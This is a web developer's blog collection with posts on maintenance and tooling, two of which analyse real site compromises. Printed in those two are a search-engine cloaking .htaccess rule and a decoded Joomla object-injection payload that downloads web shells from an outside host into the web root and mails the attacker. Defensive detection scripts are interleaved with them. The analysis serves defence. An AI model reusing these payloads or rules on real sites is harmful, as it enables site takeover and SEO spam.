.htaccess compromised


A simple, clean, flat HTML site was recently hacked, and the hack keys on the search-engine referrer. Arriving at the site by typing the domain, or via some secondary link, would serve the site without issue. Arriving via a search engine, or with a search-engine user agent, well, that’s a paddlin’.


Here’s the .htaccess file

RewriteEngine On

# Stop processing on the internal sub-request that follows a rewrite, so the
# rule below does not loop on itself.
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
# Any visitor whose user agent OR referer mentions a search engine is routed
# to the injected PHP file instead of the real page; everyone else sees the
# clean site, which is why the owner never noticed.
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]
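A small check for this kind of cloaking rule, added here as an example rather than anything from the original post: it walks an .htaccess text, collects the RewriteCond lines that gate each RewriteRule, and flags rules that are conditioned on a search-engine name appearing in the visitor's user agent or referer. The sample text is constructed (the rules above plus one benign HTTPS redirect).

```python
import re

# Constructed sample: the cloaking rules from the compromised .htaccess above,
# plus one ordinary HTTPS redirect so the detector has something to ignore.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
"""

SEARCH_ENGINES = ("google", "yahoo", "msn", "aol", "bing", "ask", "duckduck")
VISITOR_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER")


def find_cloaking_rules(htaccess_text):
    """Return (conditions, rule) pairs for every RewriteRule that is gated on
    the visitor's user agent or referer matching a search-engine name.

    mod_rewrite applies RewriteCond lines only to the RewriteRule that
    immediately follows them, so conditions are accumulated until the next
    RewriteRule and then reset."""
    findings = []
    pending = []
    for raw in htaccess_text.splitlines():
        line = raw.strip()
        if line.startswith("#") or not line:
            continue
        if line.startswith("RewriteCond"):
            pending.append(line)
        elif line.startswith("RewriteRule"):
            suspicious = [
                c for c in pending
                if any(v in c for v in VISITOR_VARS)
                and any(se in c.lower() for se in SEARCH_ENGINES)
            ]
            if suspicious:
                findings.append((suspicious, line))
            pending = []
    return findings


if __name__ == "__main__":
    for conds, rule in find_cloaking_rules(SAMPLE_HTACCESS):
        print("cloaking rule:", rule)
        for c in conds:
            print("  gated by:", c)
```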

ooooh…details-enforcers.php. Sounds important! Let’s take a look:


Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable is


is fancy-speak for create_function

$qweboi = $meymun('$a', strrev(';)a$(lave'));

becomes an anonymous function, lambda_1. On the next line we see a strrev(), because nothing is as secure as reversing a string. So let’s do it: hey, it’s an eval(base64_decode())! **sarcasm**

It is a PHP script I have put HERE. What’s funny is that they base64_encoded() a domain name in the script:
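The strrev/base64 wrapping can be unwound without ever running the PHP. The following script is an added example, not the post's or the malware's code: it folds strrev('...') and base64_decode('...') calls on string literals back into plain strings, repeating until nothing changes, so the eval($a); and create_function show up in plaintext. The sample snippet is constructed after the description above; its first line (how $meymun becomes create_function) is an assumption, since the page does not reproduce it.

```python
import base64
import re

# Constructed sample modelled on details-enforcers.php as described above.
# The first assignment is assumed (the page does not show how $meymun is
# built); the second line is the one quoted in the post; the third stands in
# for the eval(base64_decode()) call, with a harmless payload.
SAMPLE = r"""<?php
$meymun = strrev('noitcnuf_etaerc');
$qweboi = $meymun('$a', strrev(';)a$(lave'));
$qweboi(base64_decode('ZWNobyAiaGVsbG8iOw=='));
"""

STRREV = re.compile(r"strrev\(\s*'([^']*)'\s*\)")
B64 = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
RISKY = ("create_function", "eval(", "assert(", "preg_replace(")


def fold_literals(src):
    """Replace strrev('...') and base64_decode('...') applied to literals
    with the resulting literal. Nothing is executed; the loop repeats until
    a pass changes nothing, so nested wrappers unwind one layer per pass."""
    def rev(m):
        return "'" + m.group(1)[::-1] + "'"

    def b64(m):
        try:
            out = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)          # binary or malformed: leave it alone
        return "'" + out.replace("'", "\\'") + "'"

    prev = None
    while prev != src:
        prev = src
        src = STRREV.sub(rev, src)
        src = B64.sub(b64, src)
    return src


def risky_constructs(src):
    """Dangerous constructs visible once the literals are folded."""
    folded = fold_literals(src)
    return [r for r in RISKY if r in folded]


if __name__ == "__main__":
    print(fold_literals(SAMPLE))
    print("risky:", risky_constructs(SAMPLE))
```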


That sends content. The domain?


You know they are good because they use 1’s for i’s and zero’s for o’s.






never an Always

If you are in the Drupal world you will have seen the critical updates to several modules. One of these is in our install profile. This isn’t a matter of turning off the module either. Update, or remove.

It doesn’t take me long to clean the module out of the repo and push it up, but with well over 50 sites to maintain, I don’t have a lot of time to play. Luckily the other 50 or so sites are on multisite machines, so that’s just one code base to play with. But let’s get back to brass tacks here:

I have multiple people that commit to these sites, some in house and others the clients themselves. With all this noise, one voice always rings true: Master Can Always Be Pushed to Production.

I hear what you are saying: “Of course it can, silly!”

With that I will say: Sometimes, every now and then, when things just don’t work the way they are supposed to, when the needs of the client outweigh the needs of the community, a kitten can be killed. And if core can be hacked, then can master be not-production-ready? You betcha’.

Yes, Dorothy, it is a scary world.

So when you hear someone say that master can Always be pushed up, remember that there is never an Always.

Heckle the Jekyll

I love / love / love the idea of static pages over CMS driven systems for small sites. (Even front pages of large sites, but that is another discussion!) That being said I have been bitten by the Jekyll bug, and I’m finding it a rather annoying itch.

Another idea I love is speed. Give me a fast website and I’ll be happy. Hence the love for static sites over CMS, and all that overhead.

Back to Jekyll: For a test site I set up CloudIntel. It’s a simple site used to promote the sale of the domain (and its sister .net domain) and is scoring a 90 on Google’s Speed Insight. Of course that shouldn’t be that hard since it is such a simple site.

The site is hosted on Github and it’s working fine, so I guess I must change something. Let’s change everything.

Gitlab has me intrigued. Mainly the Free Private Repos. Sure, github is getting my $7/month, and I have a page, but according to the fine print regs, I can only have one page. With Gitlab I can push out small sites with glee.

Well, maybe not glee. More on that in a minute.


On a random research for speeding up a WordPress site I came across Impatient Jekyll.

Blazing fast rendering Strongly optimized so that you start with high score on Google Page Speed Insights, and an excellent SpeedIndex on webpagetest.org

Another Change

So everything seems fine. An optimized Jekyll, a new host. Let’s pile on.

Add: Gulp

And now it’s broken. I think it is a gulp deploy as the hook is for github, not gitlab. Using git I can push up the site, and it all goes up, save the css. This is a common issue and has been driving me up the wall.

Looks like I’ve got some fun planned for the weekend.



WP Plugins

I was asked to do a review for a plugin and it got me thinking. Nearly every week I have a WordPress site cross my desk, usually with a security issue, and in turn I install the same plugins. I thought it would be interesting to share the couple that I use, and see if there are any favorites out there from you that you would like to share.

  1. ShortPixel
  2. Sucuri (some sites)
  3. W3 Total Cache
  4. Simple 301 Redirects & Bulk Uploader
  5. WP Database Backup (or if I can’t install a plugin)
  6. Adminer (Not a plugin)

You’ll note that Sucuri does not get put on all sites, and Adminer is not a plugin, and if it is put on the site, it is only temporary.

The big ones for me are ShortPixel, which is an image compressor, the W3 Total Cache and both of the 301 Redirects. These plugins help with page speed and working with the SEO team.

The Database Backup/Adminer options are there for db access. Before I do any work on a site a snapshot is taken of the db. Adminer is a stand-alone PHP script for accessing MySQL databases. Yes, there are times when I only have FTP access, no plugin or other access to work in the site. I can hear you: “But Eric, if you have FTP can’t you ….?” You’d be surprised, just like I was when I would FTP a plugin only to have it deleted by the security software on the server. Sometimes this job is a challenge 🙂

But enough of my rambling. I’m sure I’m missing some, that I’ll add later.

What are your goto plugins?



A Startup Idea Problem

Let me start by saying I have a Startup Idea. Actually, I have many Start Up Ideas, which leads to a problem: which one do I build?

This leads to another problem. I don’t really want to build them. I like the ideas, and would like to use the end products…but the time to build the thing, well, I have a lot on my plate and don’t really want to take more time from family.

I have thought about building MVPs on each of the ideas. Lay down the foundation from which empires are built. But I don’t like empires. I’m more the “Get off my lawn” than “Let’s party”.

I had the thought of selling the ideas, but I can’t even sell a domain name. Hell, www.cloudintel.com is prime and the most I was offered was $200.

Then I had an idea, one that is both brilliant and stupid. What if I give them away? I’ll build a site that over set increments of time (weekly/monthly) a new idea is presented detailing the idea, thoughts on its construction and income channels.

Genius! Of course, as with any venture, it must be cleared by the CEO (my wife).

So, if you feel this is a great idea, leave a comment I can use as part of my presentation to make it so. If it is a bad idea, just tell me I’m daft.


Hmmm…what do we have here?

As you can probably see in this screenshot of an Apache access log, the overview shows something a bit off: all those individual lines peppered by those wide blocks there in the middle. They stand out like sore thumbs, don’t they?

Let’s take a closer look.


1×2.1×7.1×9.1×2 – – [11/May/2016:07:52:42 +0000] “GET /login HTTP/1.0” 200 3138 “-” “}__test|O:21:\”JDatabaseDriverMysqli\”:3:{s:2:\”fc\”;O:17:\”JSimplepieFactory\”:0:{}s:21:\”\\0\\0\\0disconnectHandlers\”;a:1:{i:0;a:2:{i:0;O:9:\”SimplePie\”:5:{s:8:\”sanitize\”;O:20:\”JDatabaseDriverMysql\”:0:{}s:8:\”feed_url\”;s:3738:\”eval(base64_decode(‘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’));JFactory::getConfig();exit\”;s:19:\”cache_name_function\”;s:6:\”assert\”;s:5:\”cache\”;b:1;s:11:\”cache_class\”;O:20:\”JDatabaseDriverMysql\”:0:{}}i:1;s:4:\”init\”;}}s:13:\”\\0\\0\\0connection\”;b:1;}\xf0\xfd\xfd\xfd” vhost=ala.devcloud.acquia-sites.com host=www.website.org hosting_site=ala pid=1219 request_time=158579 request_id=”v-578582fe-174d-11e6-a036-22000a1e875f”

Someone is sending a large block of data into my server. Let’s take a closer look.

Using <?php echo base64_decode('allthatcrap'); ?> I get:

$check = $_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;

So, looking for a file xxxx.php in the media directory, are we?

Let’s decode the rest of the package.


// Decoded body of the payload, as captured. It downloads text files from
// remote hosts and writes them into the web root as PHP files (web shells
// and a mailer), then e-mails the attacker the shell's location.
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
}

// Fetch a remote file and write it out as /media/css.php
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
echo $check."";
echo "not exits";
echo "done .\n " ;

// Same again for /media/jmail.php
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
echo $check2."";
echo "not exits2";
echo "done2 .\n " ;

// The remaining targets are fetched and opened for writing but never
// written. fopen(..., 'w') still truncates an existing file, so the last
// one empties Joomla's own libraries/joomla/session/session.php.
$check3=$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
$text3 = http_get('');   // URL is empty in the captured payload
$op3=fopen($check3, 'w');

$check4=$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
$op4=fopen($check4, 'w');

$check5=$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
$op5=fopen($check5, 'w');

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');

// Phone home: mail the server name, shell URL and uname to the attacker
// (the recipient address was blank in the captured copy).
$toz = "";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen <vonReinherzKlaus@SaikounaHibi.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);


Well, well, well…looking to hack a Joomla site, huh?

Anyway…nothing to see here folks. No Joomla site….but watch the logs!
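One way to actually watch the logs for this, added here as an example and not part of the original post: a Python scanner that parses Apache combined-format lines and flags any whose user agent or referer carries a serialized PHP object (the O:<len>:"Class":<n>:{ shape of the entry above), noting the class names involved and whether eval/assert/base64_decode appear alongside. The log lines are constructed, with a short placeholder where the real base64 blob was.

```python
import re

# Constructed sample Apache access-log lines (made-up IPs; the second line
# copies the shape of the entry above with a placeholder base64 payload).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/May/2016:07:50:01 +0000] "GET /about HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
    '10.0.0.9 - - [11/May/2016:07:52:42 +0000] "GET /login HTTP/1.0" 200 3138 '
    '"-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";'
    'O:17:\\"JSimplepieFactory\\":0:{}s:8:\\"feed_url\\";s:40:\\"'
    'eval(base64_decode(\'QUJD\'));JFactory::getConfig();exit\\";'
    's:19:\\"cache_name_function\\";s:6:\\"assert\\";}\\xf0\\xfd\\xfd\\xfd"',
    '10.0.0.7 - - [11/May/2016:07:53:10 +0000] "POST /contact HTTP/1.1" 302 0 '
    '"https://www.google.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Combined log format; referer and UA may contain Apache-escaped \" and \xHH.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"'
)
# O:<len>:"ClassName":<props>:{  with the quotes optionally backslash-escaped
PHP_OBJECT = re.compile(r'O:\d+:\\?"(?P<cls>[A-Za-z_]\w*)\\?":\d+:\{')
CODE_EXEC = re.compile(r'\b(?:eval|assert|base64_decode)\s*\(')


def scan_log(lines):
    """Return one finding per log line whose user agent or referer carries a
    serialized PHP object, i.e. the shape of an object-injection payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("ua", "referer"):
            value = m.group(field)
            classes = PHP_OBJECT.findall(value)
            if classes:
                findings.append({
                    "ip": m.group("ip"), "request": m.group("request"),
                    "field": field, "classes": classes,
                    "code_exec": bool(CODE_EXEC.search(value)),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```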

Another Day in WordPress

So, this was a fun one. For starters it wasn’t a hacked site, so I’ll be eternally grateful for this. What it was was a non-WordPress/WordPress site.

Yeah, it threw me as well.

For starters there are two sites: flat PHP files, and a WP site in the /blog directory which is reached via a subdomain. The front page was a mimic of the WP theme, with a SimplePie object pulling from an RSS feed of the WP site to drive a loop that shows blog posts within the blog.

Confused yet?

Now, I can certainly understand the front page being a flat file, or in this case a headless WP, the speed alone you gain for SEO and mobile is worth the effort.

However, and I know this is a small stretch, I feel it is worth asking: if you are working on a project like this, outside the normal paradigm of the application, please leave some notes. It doesn’t have to be much, but understand that just because you built it doesn’t mean you will be maintaining it. Companies lose contracts, people move on.

This is just a simple plea, because, in case you didn’t know, in time you will be on this side of the fence, and you’ll know exactly what I’m talking about.